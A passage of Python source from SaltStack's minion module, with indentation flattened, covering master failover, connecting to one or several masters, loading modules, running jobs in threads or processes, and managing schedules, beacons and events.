# If failover is set, minion have to failover on DNS errors instead of retry DNS resolve.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
local_masters = copy.copy(opts['master'])
for master in local_masters:
opts['master'] = master
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
self.opts = opts
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = local_masters
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError:
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
self.connected = False
msg = ('No master could be reached or all masters denied '
'the minions connection attempt.')
log.error(msg)
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
opts.update(prep_ip_port(opts))
opts.update(resolve_dns(opts))
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
self.eval_master(self.opts, failed=True)
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None):
self.opts = salt.config.minion_config(opts['conf_file'])
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
self.gen_modules(initial_load=True)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(
self.opts,
utils=self.utils,
whitelist=self.whitelist,
initial_load=initial_load)
self.serializers = salt.loader.serializers(self.opts)
if self.mk_returners:
self.returners = salt.loader.returners(self.opts, self.functions)
if self.mk_states:
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
if self.mk_rend:
self.rend = salt.loader.render(self.opts, self.functions)
if self.mk_matcher:
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
class MultiMinion(MinionBase):
'''
Create a multi minion interface, this creates as many minions as are
defined in the master option and binds each minion object to a respective
master.
'''
# timeout for one of the minions to auth with a master
MINION_CONNECT_TIMEOUT = 5
def __init__(self, opts):
super(MultiMinion, self).__init__(opts)
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
zmq.eventloop.ioloop.install()
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
def _spawn_minions(self):
'''
Spawn all the coroutines which will sign in to masters
'''
if not isinstance(self.opts['master'], list):
log.error(
'Attempting to start a multimaster system with one master')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
for master in set(self.opts['master']):
s_opts = copy.deepcopy(self.opts)
s_opts['master'] = master
s_opts['multimaster'] = True
s_opts['auth_timeout'] = self.MINION_CONNECT_TIMEOUT
self.io_loop.spawn_callback(self._connect_minion, s_opts)
@tornado.gen.coroutine
def _connect_minion(self, opts):
'''
Create a minion, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
try:
minion = Minion(opts,
self.MINION_CONNECT_TIMEOUT,
False,
io_loop=self.io_loop,
loaded_base_name='salt.loader.{0}'.format(opts['master']),
)
yield minion.connect_master()
minion.tune_in(start=False)
break
except SaltClientError as exc:
log.error('Error while bringing up minion for multi-master. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except Exception as e:
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
# Multi Master Tune In
def tune_in(self):
'''
Bind to the masters
This loop will attempt to create connections to masters it hasn't connected
to yet, but once the initial connection is made it is up to ZMQ to do the
reconnect (don't know of an API to get the state here in salt)
'''
# Fire off all the minion coroutines
self.minions = self._spawn_minions()
# serve forever!
self.io_loop.start()
class Minion(MinionBase):
'''
This class instantiates a minion, runs connections for a minion,
and loads all of the functions into the minion
'''
def __init__(self, opts, timeout=60, safe=True, loaded_base_name=None, io_loop=None): # pylint: disable=W0231
'''
Pass in the options dict
'''
# this means that the parent class doesn't know *which* master we connect to
super(Minion, self).__init__(opts)
self.timeout = timeout
self.safe = safe
self._running = None
self.win_proc = []
self.loaded_base_name = loaded_base_name
if io_loop is None:
zmq.eventloop.ioloop.install()
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
# Warn if ZMQ < 3.2
if HAS_ZMQ:
try:
zmq_version_info = zmq.zmq_version_info()
except AttributeError:
# PyZMQ <= 2.1.9 does not have zmq_version_info, fall back to
# using zmq.zmq_version() and build a version info tuple.
zmq_version_info = tuple(
[int(x) for x in zmq.zmq_version().split('.')] # pylint: disable=no-member
)
if zmq_version_info < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
# Late setup the of the opts grains, so we can log from the grains
# module. If this is a proxy, however, we need to init the proxymodule
# before we can get the grains.
if not salt.utils.is_proxy():
self.opts['grains'] = salt.loader.grains(opts)
def sync_connect_master(self, timeout=None):
'''
Block until we are connected to a master
'''
self._sync_connect_master_success = False
log.debug("sync_connect_master")
def on_connect_master_future_done(future):
self._sync_connect_master_success = True
self.io_loop.stop()
self._connect_master_future = self.connect_master()
# finish connecting to master
self._connect_master_future.add_done_callback(on_connect_master_future_done)
if timeout:
self.io_loop.call_later(timeout, self.io_loop.stop)
self.io_loop.start()
# I made the following 3 line oddity to preserve traceback.
# Please read PR #23978 before changing, hopefully avoiding regressions.
# Good luck, we're all counting on you. Thanks.
future_exception = self._connect_master_future.exc_info()
if future_exception:
raise six.reraise(*future_exception)
if timeout and self._sync_connect_master_success is False:
raise SaltDaemonNotRunning('Failed to connect to the salt-master')
@tornado.gen.coroutine
def connect_master(self):
'''
Return a future which will complete when you are connected to a master
'''
master, self.pub_channel = yield self.eval_master(self.opts, self.timeout, self.safe)
yield self._post_master_init(master)
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
self.opts['master'] = master
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv')
).compile_pillar()
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if self.opts['mine_enabled'] and 'mine.update' in self.functions:
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2,
'return_job': self.opts.get('mine_return_job', False)
}
}, persist=True)
log.info('Added mine.update to scheduler')
else:
self.schedule.delete_job('__mine_interval', persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
def _return_retry_timer(self):
'''
Based on the minion configuration, either return a randomized timer or
just return the value of the return_retry_timer.
'''
msg = 'Minion return retry timer set to {0} seconds'
if self.opts.get('return_retry_timer_max'):
try:
random_retry = randint(self.opts['return_retry_timer'], self.opts['return_retry_timer_max'])
log.debug(msg.format(random_retry) + ' (randomized)')
return random_retry
except ValueError:
# Catch wiseguys using negative integers here
log.error(
'Invalid value (return_retry_timer: {0} or return_retry_timer_max: {1})'
'both must be a positive integers'.format(
self.opts['return_retry_timer'],
self.opts['return_retry_timer_max'],
)
)
log.debug(msg.format(DEFAULT_MINION_OPTS['return_retry_timer']))
return DEFAULT_MINION_OPTS['return_retry_timer']
else:
log.debug(msg.format(self.opts.get('return_retry_timer')))
return self.opts.get('return_retry_timer')
def _prep_mod_opts(self):
'''
Returns a copy of the opts with key bits stripped out
'''
mod_opts = {}
for key, val in six.iteritems(self.opts):
if key == 'logger':
continue
mod_opts[key] = val
return mod_opts
def _process_beacons(self):
'''
Process each beacon and send events if appropriate
'''
# Process Beacons
try:
beacons = self.process_beacons(self.functions)
except Exception as exc:
log.critical('Beacon processing failed: {0}. No beacons will be processed.'.format(traceback.format_exc(exc)))
beacons = None
if beacons:
self._fire_master(events=beacons)
for beacon in beacons:
serialized_data = salt.utils.dicttrim.trim_dict(
self.serial.dumps(beacon['data']),
self.opts.get('max_event_size', 1048576),
is_msgpacked=True,
)
log.debug('Sending event - data = {0}'.format(beacon['data']))
event = '{0}{1}{2}'.format(
beacon['tag'],
salt.utils.event.TAGEND,
serialized_data,
)
self.event_publisher.handle_publish([event])
def _load_modules(self, force_refresh=False, notify=False, proxy=None):
'''
Return the functions and the returners loaded up from the loader
module
'''
# if this is a *nix system AND modules_max_memory is set, lets enforce
# a memory limit on module imports
# this feature ONLY works on *nix like OSs (resource module doesn't work on windows)
modules_max_memory = False
if self.opts.get('modules_max_memory', -1) > 0 and HAS_PSUTIL and HAS_RESOURCE:
log.debug('modules_max_memory set, enforcing a maximum of {0}'.format(self.opts['modules_max_memory']))
modules_max_memory = True
old_mem_limit = resource.getrlimit(resource.RLIMIT_AS)
rss, vms = psutil.Process(os.getpid()).memory_info()
mem_limit = rss + vms + self.opts['modules_max_memory']
resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit))
elif self.opts.get('modules_max_memory', -1) > 0:
if not HAS_PSUTIL:
log.error('Unable to enforce modules_max_memory because psutil is missing')
if not HAS_RESOURCE:
log.error('Unable to enforce modules_max_memory because resource is missing')
self.opts['grains'] = salt.loader.grains(self.opts, force_refresh)
self.utils = salt.loader.utils(self.opts)
if self.opts.get('multimaster', False):
s_opts = copy.deepcopy(self.opts)
functions = salt.loader.minion_mods(s_opts, utils=self.utils, proxy=proxy,
loaded_base_name=self.loaded_base_name, notify=notify)
else:
functions = salt.loader.minion_mods(self.opts, utils=self.utils, notify=notify, proxy=proxy)
returners = salt.loader.returners(self.opts, functions)
errors = {}
if '_errors' in functions:
errors = functions['_errors']
functions.pop('_errors')
# we're done, reset the limits!
if modules_max_memory is True:
resource.setrlimit(resource.RLIMIT_AS, old_mem_limit)
executors = salt.loader.executors(self.opts, functions)
return functions, returners, errors, executors
def _fire_master(self, data=None, tag=None, events=None, pretag=None, timeout=60):
'''
Fire an event on the master, or drop message if unable to send.
'''
load = {'id': self.opts['id'],
'cmd': '_minion_event',
'pretag': pretag,
'tok': self.tok}
if events:
load['events'] = events
elif data and tag:
load['data'] = data
load['tag'] = tag
elif not data and tag:
load['data'] = {}
load['tag'] = tag
else:
return
channel = salt.transport.Channel.factory(self.opts)
try:
result = channel.send(load, timeout=timeout)
return True
except Exception:
log.info('fire_master failed: {0}'.format(traceback.format_exc()))
return False
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
if 'user' in data:
log.info(
'User {0[user]} Executing command {0[fun]} with jid '
'{0[jid]}'.format(data)
)
else:
log.info(
'Executing command {0[fun]} with jid {0[jid]}'.format(data)
)
log.debug('Command details {0}'.format(data))
if isinstance(data['fun'], six.string_types):
if data['fun'] == 'sys.reload_modules':
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# We stash an instance references to allow for the socket
# communication in Windows. You can't pickle functions, and thus
# python needs to be able to reconstruct the reference on the other
# side.
instance = self
multiprocessing_enabled = self.opts.get('multiprocessing', True)
if multiprocessing_enabled:
if sys.platform.startswith('win'):
# let python reconstruct the minion on the other side if we're
# running on windows
instance = None
process = SignalHandlingMultiprocessingProcess(
target=self._target, args=(instance, self.opts, data)
)
else:
process = threading.Thread(
target=self._target,
args=(instance, self.opts, data),
name=data['jid']
)
if multiprocessing_enabled:
with default_signals(signal.SIGINT, signal.SIGTERM):
# Reset current signals before starting the process in
# order not to inherit the current signal handlers
process.start()
else:
process.start()
# TODO: remove the windows specific check?
if multiprocessing_enabled and not salt.utils.is_windows():
# we only want to join() immediately if we are daemonizing a process
process.join()
else:
self.win_proc.append(process)
def ctx(self):
'''Return a single context manager for the minion's data
'''
return contextlib.nested(
self.functions.context_dict.clone(),
self.returners.context_dict.clone(),
self.executors.context_dict.clone(),
)
@classmethod
def _target(cls, minion_instance, opts, data):
with tornado.stack_context.StackContext(minion_instance.ctx):
if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
Minion._thread_multi_return(minion_instance, opts, data)
else:
Minion._thread_return(minion_instance, opts, data)
@classmethod
def _thread_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
not salt.log.setup.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
if not minion_instance:
minion_instance = cls(opts)
if not hasattr(minion_instance, 'functions'):
functions, returners, function_errors, executors = (
minion_instance._load_modules()
)
minion_instance.functions = functions
minion_instance.returners = returners
minion_instance.function_errors = function_errors
minion_instance.executors = executors
if not hasattr(minion_instance, 'serial'):
minion_instance.serial = salt.payload.Serial(opts)
if not hasattr(minion_instance, 'proc_dir'):
uid = salt.utils.get_uid(user=opts.get('user', None))
minion_instance.proc_dir = (
get_proc_dir(opts['cachedir'], uid=uid)
)
fn_ = os.path.join(minion_instance.proc_dir, data['jid'])
if opts['multiprocessing'] and not salt.utils.is_windows():
# Shutdown the multiprocessing before daemonizing
salt.log.setup.shutdown_multiprocessing_logging()
salt.utils.daemonize_if(opts)
# Reconfigure multiprocessing logging after daemonizing
salt.log.setup.setup_multiprocessing_logging()
salt.utils.appendproctitle('{0}._thread_return {1}'.format(cls.__name__, data['jid']))
sdata = {'pid': os.getpid()}
sdata.update(data)
log.info('Starting a new job with PID {0}'.format(sdata['pid']))
with salt.utils.fopen(fn_, 'w+b') as fp_:
fp_.write(minion_instance.serial.dumps(sdata))
ret = {'success': False}
function_name = data['fun']
if function_name in minion_instance.functions:
try:
func = minion_instance.functions[function_name]
args, kwargs = load_args_and_kwargs(
func,
data['arg'],
data)
minion_instance.functions.pack['__context__']['retcode'] = 0
executors = data.get('module_executors') or opts.get('module_executors', ['direct_call.get'])
if isinstance(executors, six.string_types):
executors = [executors]
elif not isinstance(executors, list) or not executors:
raise SaltInvocationError("Wrong executors specification: {0}. String or non-empty list expected".
format(executors))
if opts.get('sudo_user', '') and executors[-1] != 'sudo.get':
if executors[-1] in FUNCTION_EXECUTORS:
executors[-1] = 'sudo.get' # replace
else:
executors.append('sudo.get') # append
log.trace('Executors list {0}'.format(executors)) # pylint: disable=no-member
# Get executors
def get_executor(name):
executor_class = minion_instance.executors.get(name)
if executor_class is None:
raise SaltInvocationError("Executor '{0}' is not available".format(name))
return executor_class
# Get the last one that is function executor
executor = get_executor(executors.pop())(opts, data, func, args, kwargs)
# Instantiate others from bottom to the top
for executor_name in reversed(executors):
executor = get_executor(executor_name)(opts, data, executor)
return_data = executor.execute()
if isinstance(return_data, types.GeneratorType):
ind = 0
iret = {}
for single in return_data:
if isinstance(single, dict) and isinstance(iret, dict):
iret.update(single)
else:
if not iret:
iret = []
iret.append(single)
tag = tagify([data['jid'], 'prog', opts['id'], str(ind)], 'job')
event_data = {'return': single}
minion_instance._fire_master(event_data, tag)
ind += 1
ret['return'] = iret
else:
ret['return'] = return_data
ret['retcode'] = minion_instance.functions.pack['__context__'].get(
'retcode',
0
)
ret['success'] = True
except CommandNotFoundError as exc:
msg = 'Command required for \'{0}\' not found'.format(
function_name
)
log.debug(msg, exc_info=True)
ret['return'] = '{0}: {1}'.format(msg, exc)
ret['out'] = 'nested'
except CommandExecutionError as exc:
log.error(
'A command in \'{0}\' had a problem: {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR: {0}'.format(exc)
ret['out'] = 'nested'
except SaltInvocationError as exc:
log.error(
'Problem executing \'{0}\': {1}'.format(
function_name,
exc
),
exc_info_on_loglevel=logging.DEBUG
)
ret['return'] = 'ERROR executing \'{0}\': {1}'.format(
function_name, exc
)
ret['out'] = 'nested'
except TypeError as exc:
msg = 'Passed invalid arguments to {0}: {1}\n{2}'.format(function_name, exc, func.__doc__, )
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
ret['return'] = msg
ret['out'] = 'nested'
except Exception:
msg = 'The minion function caused an exception'
log.warning(msg, exc_info_on_loglevel=logging.DEBUG)
salt.utils.error.fire_exception(salt.exceptions.MinionError(msg), opts, job=data)
ret['return'] = '{0}: {1}'.format(msg, traceback.format_exc())
ret['out'] = 'nested'
else:
ret['return'] = minion_instance.functions.missing_fun_string(function_name)
mod_name = function_name.split('.')[0]
if mod_name in minion_instance.function_errors:
ret['return'] += ' Possible reasons: \'{0}\''.format(
minion_instance.function_errors[mod_name]
)
ret['success'] = False
ret['retcode'] = 254
ret['out'] = 'nested'
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'master_id' in data:
ret['master_id'] = data['master_id']
if 'metadata' in data:
if isinstance(data['metadata'], dict):
ret['metadata'] = data['metadata']
else:
log.warning('The metadata parameter must be a dictionary. Ignoring.')
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
ret['id'] = opts['id']
for returner in set(data['ret'].split(',')):
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
log.error(traceback.format_exc())
@classmethod
def _thread_multi_return(cls, minion_instance, opts, data):
'''
This method should be used as a threading target, start the actual
minion side execution.
'''
salt.utils.appendproctitle('{0}._thread_multi_return {1}'.format(cls.__name__, data['jid']))
# this seems awkward at first, but it's a workaround for Windows
# multiprocessing communication.
if sys.platform.startswith('win') and \
opts['multiprocessing'] and \
not salt.log.is_logging_configured():
# We have to re-init the logging system for Windows
salt.log.setup_console_logger(log_level=opts.get('log_level', 'info'))
if opts.get('log_file'):
salt.log.setup_logfile_logger(opts['log_file'], opts.get('log_level_logfile', 'info'))
if not minion_instance:
minion_instance = cls(opts)
ret = {
'return': {},
'success': {},
}
for ind in range(0, len(data['fun'])):
ret['success'][data['fun'][ind]] = False
try:
func = minion_instance.functions[data['fun'][ind]]
args, kwargs = load_args_and_kwargs(
func,
data['arg'][ind],
data)
ret['return'][data['fun'][ind]] = func(*args, **kwargs)
ret['success'][data['fun'][ind]] = True
except Exception as exc:
trb = traceback.format_exc()
log.warning(
'The minion function caused an exception: {0}'.format(
exc
)
)
ret['return'][data['fun'][ind]] = trb
ret['jid'] = data['jid']
ret['fun'] = data['fun']
ret['fun_args'] = data['arg']
if 'metadata' in data:
ret['metadata'] = data['metadata']
minion_instance._return_pub(
ret,
timeout=minion_instance._return_retry_timer()
)
if data['ret']:
if 'ret_config' in data:
ret['ret_config'] = data['ret_config']
if 'ret_kwargs' in data:
ret['ret_kwargs'] = data['ret_kwargs']
for returner in set(data['ret'].split(',')):
ret['id'] = opts['id']
try:
minion_instance.returners['{0}.returner'.format(
returner
)](ret)
except Exception as exc:
log.error(
'The return failed for job {0} {1}'.format(
data['jid'],
exc
)
)
def _return_pub(self, ret, ret_cmd='_return', timeout=60):
'''
Return the data from the executed command to the master server
'''
jid = ret.get('jid', ret.get('__jid__'))
fun = ret.get('fun', ret.get('__fun__'))
if self.opts['multiprocessing']:
fn_ = os.path.join(self.proc_dir, jid)
if os.path.isfile(fn_):
try:
os.remove(fn_)
except (OSError, IOError):
# The file is gone already
pass
log.info('Returning information for job: {0}'.format(jid))
channel = salt.transport.Channel.factory(self.opts)
if ret_cmd == '_syndic_return':
load = {'cmd': ret_cmd,
'id': self.opts['id'],
'jid': jid,
'fun': fun,
'arg': ret.get('arg'),
'tgt': ret.get('tgt'),
'tgt_type': ret.get('tgt_type'),
'load': ret.get('__load__')}
if '__master_id__' in ret:
load['master_id'] = ret['__master_id__']
load['return'] = {}
for key, value in six.iteritems(ret):
if key.startswith('__'):
continue
load['return'][key] = value
else:
load = {'cmd': ret_cmd,
'id': self.opts['id']}
for key, value in six.iteritems(ret):
load[key] = value
if 'out' in ret:
if isinstance(ret['out'], six.string_types):
load['out'] = ret['out']
else:
log.error('Invalid outputter {0}. This is likely a bug.'
.format(ret['out']))
else:
try:
oput = self.functions[fun].__outputter__
except (KeyError, AttributeError, TypeError):
pass
else:
if isinstance(oput, six.string_types):
load['out'] = oput
if self.opts['cache_jobs']:
# Local job cache has been enabled
fn_ = os.path.join(
self.opts['cachedir'],
'minion_jobs',
load['jid'],
'return.p')
jdir = os.path.dirname(fn_)
if not os.path.isdir(jdir):
os.makedirs(jdir)
salt.utils.fopen(fn_, 'w+b').write(self.serial.dumps(ret))
try:
ret_val = channel.send(load, timeout=timeout)
except SaltReqTimeoutError:
msg = ('The minion failed to return the job information for job '
'{0}. This is often due to the master being shut down or '
'overloaded. If the master is running consider increasing '
'the worker_threads value.').format(jid)
log.warn(msg)
return ''
log.trace('ret_val = {0}'.format(ret_val)) # pylint: disable=no-member
return ret_val
def _state_run(self):
'''
Execute a state run based on information set in the minion config file
'''
if self.opts['startup_states']:
data = {'jid': 'req', 'ret': self.opts.get('ext_job_cache', '')}
if self.opts['startup_states'] == 'sls':
data['fun'] = 'state.sls'
data['arg'] = [self.opts['sls_list']]
elif self.opts['startup_states'] == 'top':
data['fun'] = 'state.top'
data['arg'] = [self.opts['top_file']]
else:
data['fun'] = 'state.highstate'
data['arg'] = []
self._handle_decoded_payload(data)
def _refresh_grains_watcher(self, refresh_interval_in_minutes):
'''
Create a loop that will fire a pillar refresh to inform a master about a change in the grains of this minion
:param refresh_interval_in_minutes:
:return: None
'''
if '__update_grains' not in self.opts.get('schedule', {}):
if 'schedule' not in self.opts:
self.opts['schedule'] = {}
self.opts['schedule'].update({
'__update_grains':
{
'function': 'event.fire',
'args': [{}, 'grains_refresh'],
'minutes': refresh_interval_in_minutes
}
})
def _fire_master_minion_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def module_refresh(self, force_refresh=False, notify=False):
'''
Refresh the functions and returners.
'''
log.debug('Refreshing modules. Notify={0}'.format(notify))
if hasattr(self, 'proxy'):
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh,
notify=notify,
proxy=self.proxy) # pylint: disable=no-member
else:
self.functions, self.returners, _, self.executors = self._load_modules(force_refresh, notify=notify)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
# TODO: only allow one future in flight at a time?
@tornado.gen.coroutine
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
log.debug('Refreshing pillar')
try:
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
except SaltClientError:
# Do not exit if a pillar refresh fails.
log.error('Pillar data could not be refreshed. '
'One or more masters may be down!')
self.module_refresh(force_refresh)
def manage_schedule(self, tag, data):
'''
Refresh the functions and returners.
'''
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
persist = data.get('persist', None)
if func == 'delete':
self.schedule.delete_job(name, persist)
elif func == 'add':
self.schedule.add_job(schedule, persist)
elif func == 'modify':
self.schedule.modify_job(name, schedule, persist, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, persist, where)
elif func == 'run_job':
self.schedule.run_job(name)
elif func == 'disable_job':
self.schedule.disable_job(name, persist, where)
elif func == 'reload':
self.schedule.reload(schedule)
elif func == 'list':
self.schedule.list(where)
elif func == 'save_schedule':
self.schedule.save_schedule()
def manage_beacons(self, tag, data):
'''
Manage Beacons
'''
func = data.get('func', None)
name = data.get('name', None)
beacon_data = data.get('beacon_data', None)
if func == 'add':
self.beacons.add_beacon(name, beacon_data)
elif func == 'modify':
self.beacons.modify_beacon(name, beacon_data)
elif func == 'delete':
self.beacons.delete_beacon(name)
elif func == 'enable':
self.beacons.enable_beacons()
elif func == 'disable':
self.beacons.disable_beacons()
elif func == 'enable_beacon':
self.beacons.enable_beacon(name)
elif func == 'disable_beacon':
self.beacons.disable_beacon(name)
elif func == 'list':
self.beacons.list_beacons()
def environ_setenv(self, tag, data):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
Python does not handle the SIGTERM cleanly, if it is signaled exit
the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, tag, data):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
data['tok'] = self.tok
try:
ret = channel.send(data)
return ret
except SaltReqTimeoutError:
log.warning('Unable to send mine data to master.')
return None
@tornado.gen.coroutine
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
tag, data = salt.utils.event.SaltEvent.unpack(package)
log.debug('Handling event tag \'{0}\''.format(tag))
if package.startswith('module_refresh'):
self.module_refresh(notify=data.get('notify', False))
elif package.startswith('pillar_refresh'):
yield self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(tag, data)
elif package.startswith('manage_beacons'):
self.manage_beacons(tag, data)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
